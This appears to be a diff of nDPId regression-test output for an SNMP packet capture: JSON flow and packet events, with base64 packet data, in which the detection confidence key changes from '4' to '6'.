00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1597327805470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597327805470,"pkt":"AAAAV4hpAAwpsVpsCABFAABcmE1AAEAR7KODszGl\/p4BqYyCAKEASI48MD4CAQMwEQIETLLWIgIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBG51QB0CAQACAQAwAA=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327805470,"flow_last_seen":1597327805470,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327805470,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597327805470,"flow_last_seen":1597327805470,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597327805470,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1597327805611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1597327805611,"pkt":"AAwpsVpsAAAAV4hpCABFAACFAD8AAP8RBYn+ngGpg7MxpQChjIIAcR0uMGcCAQMwEAIETLLWIgICBdwEAQACAQMEHTAbBAyAAAAJAwCqu8wAAQACAQwCAgYJBAAEAAQAMDEEDIAAAAkDAKq7zAABAAQAqB8CBG51QB0CAQACAQAwETAPBgorBgEGAw8BAQQAQQET"} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1597327805613,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1597327805613,"pkt":"AAAAV4hpAAwpsVpsCABFAACkmNVAAEAR69ODszGl\/p4BqYyCAKEAkN2JMIGFAgEDMBECBEyy1iECAwD\/4wQBBwIBAwQ7MDkEDIAAAAkDAKq7zAABAAIBDAICBgkEClNIQTFBRVMxMjgEDJtziJHxaodwRs3eIQQIgB4HBiglqmIEMAupq3l+cOYYEzoCHoY5O4X4TJUa2wXJNOK\/b37r1sMKQ+nPnY1s\/d1MAtxa8BQz+g=="} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":53,"packets-processed":52,"total-skipped-flows":0,"total-l4-payload-len":4998,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":4,"total-updates":0,"current-active-flows":4,"total-active-flows":10,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1597328385284} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328385284,"flow_last_seen":1597328385284,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"92.135.15.240","dst_ip":"137.49.110.186","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1597328385284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1597328385284,"pkt":"AAwpOSzhAAAASwKNCABFAADJAAAAAP8RVsFchw\/wiTFuutQuAKIAtdeqMIGqAgEBBAhwdWJsaWMyY6eBmgIBFwIBAAIBADCBjjAPBggrBgECAQEDAEMDAz\/FMBcGCisGAQYDAQEEAQAGCSsGAQYDAQEFAzAPBgorBgECAQICAQECAgECMBkGCisGAQIBAgIBAgIEC0V0aGVybmV0MC8xMA8GCisGAQIBAgIBAwICAQYwJQYMKwYBBAEJAgIBARQCBBVhZG1pbmlzdHJhdGl2ZWx5IGRvd24="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328385284,"flow_last_seen":1597328385284,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"92.135.15.240","dst_ip":"137.49.110.186","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327800258,"flow_last_seen":1597327800683,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":737,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327640387,"flow_last_seen":1597327640799,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327646611,"flow_last_seen":1597327647026,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":702,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327805470,"flow_last_seen":1597327805899,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":744,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328385284,"flow_last_seen":1597328385284,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"92.135.15.240","dst_ip":"137.49.110.186","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327800258,"flow_last_seen":1597327800683,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":737,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":60694,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327640387,"flow_last_seen":1597327640799,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":60440,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327646611,"flow_last_seen":1597327647026,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":702,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"35.95.158.217","dst_ip":"30.79.214.36","src_port":49306,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1597327805470,"flow_last_seen":1597327805899,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":744,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1597328385284,"l3_proto":"ip4","src_ip":"131.179.49.165","dst_ip":"254.158.1.169","src_port":35970,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00638{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1597328420435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1597328420435,"pkt":"AAwpOSzhAAAASwKNCABFAAC1AAEAAP8RVtRchw\/wiTFuutQuAKIAoQR+MIGWAgEBBAhwdWJsaWMyY6eBhgIBHAIBAAIBADB7MA8GCCsGAQIBAQMAQwMDTYAwFwYKKwYBBgMBAQQBAAYJKwYBBgMBAQUEMA8GCisGAQIBAgIBAQICAQIwGQYKKwYBAgECAgECAgQLRXRoZXJuZXQwLzEwDwYKKwYBAgECAgEDAgIBBjASBgwrBgEEAQkCAgEBFAIEAnVw"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328648399,"flow_last_seen":1597328648399,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1597328648399,"l3_proto":"ip4","src_ip":"200.76.132.137","dst_ip":"189.111.255.214","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1597328648399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":188,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":188,"pkt_l4_len":154,"thread_ts_msec":1597328648399,"pkt":"AAwpl\/zFAAAAQogiCABFAACuAAIAAP8RsSDITISJvW\/\/1tQuAKIAmmoKMIGPAgEABAZwdWJsaWOkgYEGCCsGAQYDAQEFQAQKAR4BAgECAgEAQwMDpowwZDAPBgorBgECAQICAQECAgECMBkGCisGAQIBAgIBAgIEC0V0aGVybmV0MC8xMA8GCisGAQIBAgIBAwICAQYwJQYMKwYBBAEJAgIBARQCBBVhZG1pbmlzdHJhdGl2ZWx5IGRvd24="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328648399,"flow_last_seen":1597328648399,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1597328648399,"l3_proto":"ip4","src_ip":"200.76.132.137","dst_ip":"189.111.255.214","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328648399,"flow_last_seen":1597328648399,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1597328648399,"l3_proto":"ip4","src_ip":"200.76.132.137","dst_ip":"189.111.255.214","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snmp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597328385284,"flow_last_seen":1597328420435,"flow_idle_time":200000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1597328648399,"l3_proto":"ip4","src_ip":"92.135.15.240","dst_ip":"137.49.110.186","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1597328660640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1597328660640,"pkt":"AAwpl\/zFAAAAQogiCABFAACZAAMAAP8RsTTITISJvW\/\/1tQuAKIAhYZxMHsCAQAEBnB1YmxpY6RuBggrBgEGAwEBBUAECgEeAQIBAwIBAEMDA6tUMFEwDwYKKwYBAgECAgEBAgIBAjAZBgorBgECAQICAQICBAtFdGhlcm5ldDAvMTAPBgorBgECAQICAQMCAgEGMBIGDCsGAQQBCQICAQEUAgQCdXA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328704045,"flow_last_seen":1597328704045,"flow_idle_time":200000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1597328704045,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00769{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1597328704045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1597328704045,"pkt":"AAwpOzE1AAAAQZqWCABFAAEWAAQAAP8RqU9xE5xvh8l8N9QuAKIBAqHIMIH3AgEDMA0CASACAgXcBAEBAgEDBDMwMQQMgAAACQMAqrvMAAEAAgEMAgIJjAQKU0hBMU5PUFJJVgQM1oH0ll47GC4cDzqhBAAwga0EDIAAAAkDAKq7zAABAAQAp4GaAgEnAgEAAgEAMIGOMA8GCCsGAQIBAQMAQwMDvEgwFwYKKwYBBgMBAQQBAAYJKwYBBgMBAQUDMA8GCisGAQIBAgIBAQICAQIwGQYKKwYBAgECAgECAgQLRXRoZXJuZXQwLzEwDwYKKwYBAgECAgEDAgIBBjAlBgwrBgEEAQkCAgEBFAIEFWFkbWluaXN0cmF0aXZlbHkgZG93bg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328704045,"flow_last_seen":1597328704045,"flow_idle_time":200000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1597328704045,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328704045,"flow_last_seen":1597328704045,"flow_idle_time":200000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1597328704045,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00741{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1597328710051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1597328710051,"pkt":"AAwpOzE1AAAAQZqWCABFAAECAAUAAP8RqWJxE5xvh8l8N9QuAKIA7p+NMIHjAgEDMA0CASMCAgXcBAEBAgEDBDMwMQQMgAAACQMAqrvMAAEAAgEMAgIJkgQKU0hBMU5PUFJJVgQMcPbtNC5tixaBN+YcBAAwgZkEDIAAAAkDAKq7zAABAAQAp4GGAgEqAgEAAgEAMHswDwYIKwYBAgEBAwBDAwO+oTAXBgorBgEGAwEBBAEABgkrBgEGAwEBBQQwDwYKKwYBAgECAgEBAgIBAjAZBgorBgECAQICAQICBAtFdGhlcm5ldDAvMTAPBgorBgECAQICAQMCAgEGMBIGDCsGAQQBCQICAQEUAgQCdXA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328734790,"flow_last_seen":1597328734790,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1597328734790,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00789{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1597328734790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1597328734790,"pkt":"AAwpO2J6AAAAsIjCCABFAAEiAAYAAP8Rvb7NUyTkoK5qINQuAKIBDjinMIIBAgIBAzANAgElAgIF3AQBAwIBAwQ7MDkEDIAAAAkDAKq7zAABAAIBDAICCaoEClNIQTFBRVMxMjgEDPKVtczhvcY8vhvJVAQIsS3M0yiHjgUEgbAnmr8wOCOyncERaoSBQmnUCi+GoiiHqqCMFm1apQAmwk\/cF1kswlENhkIfwuB9kMILtKYuWyXXhtZBleYhoJQEJYL7o1K69bHQdMdklHbovW30zBhWTTYkhrDbN4HddHDCYjhho5GVn7THewhnReV4IFApn9hzgyZDXzSTb2D\/0RJlFbaWfzYDq0UV1+MA7WWFcwUGZiNX1Ldy1p\/JOH\/FaH0e0KzJstFu7lv44GdmqQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328734790,"flow_last_seen":1597328734790,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1597328734790,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328734790,"flow_last_seen":1597328734790,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1597328734790,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1597328742081,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1597328742081,"pkt":"AAwpO2J6AAAAsIjCCABFAAENAAcAAP8RvdLNUyTkoK5qINQuAKIA+WP9MIHuAgEDMA0CAScCAgXcBAEDAgEDBDswOQQMgAAACQMAqrvMAAEAAgEMAgIJsgQKU0hBMUFFUzEyOAQMO\/P\/PiMrdy+zI+pWBAixLczTKIeOBgSBnCB4NWdRsPt\/T9sXiMHAl69GjDJCReyQSzQtmF\/nJsUYLVpgPIp8uZxxPNbTjAYUMQF1Osi1p+iIFHpG7RpGbbDoCSdQgbLhTwfCVCvu95CHITG6rLcZ3QulV6HanbKQFQQW+YRQ9YjpumIMl5\/KtH3Wg4qxgFbt6UHjjb8VdU58\/THnGpgoaAoCTQPlYaIf1lQq7RYRPcJRLqyyuw=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328757701,"flow_last_seen":1597328757701,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1597328757701,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1597328757701,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1597328757701,"pkt":"AAwpbM85AAAAgfGMCABFAAEMAAgAAP8R+8t8NcSwZ\/gWL9QuAKIA+FTTMIHtAgEDMA0CASgCAgXcBAEAAgEDBCkwJwQMgAAACQMAqrvMAAEAAgEMAgIJwQQMTk9BVVRITk9QUklWBAAEADCBrQQMgAAACQMAqrvMAAEABACngZoCAS8CAQACAQAwgY4wDwYIKwYBAgEBAwBDAwPRPjAXBgorBgEGAwEBBAEABgkrBgEGAwEBBQMwDwYKKwYBAgECAgEBAgIBAjAZBgorBgECAQICAQICBAtFdGhlcm5ldDAvMTAPBgorBgECAQICAQMCAgEGMCUGDCsGAQQBCQICAQEUAgQVYWRtaW5pc3RyYXRpdmVseSBkb3du"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328757701,"flow_last_seen":1597328757701,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1597328757701,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328757701,"flow_last_seen":1597328757701,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1597328757701,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 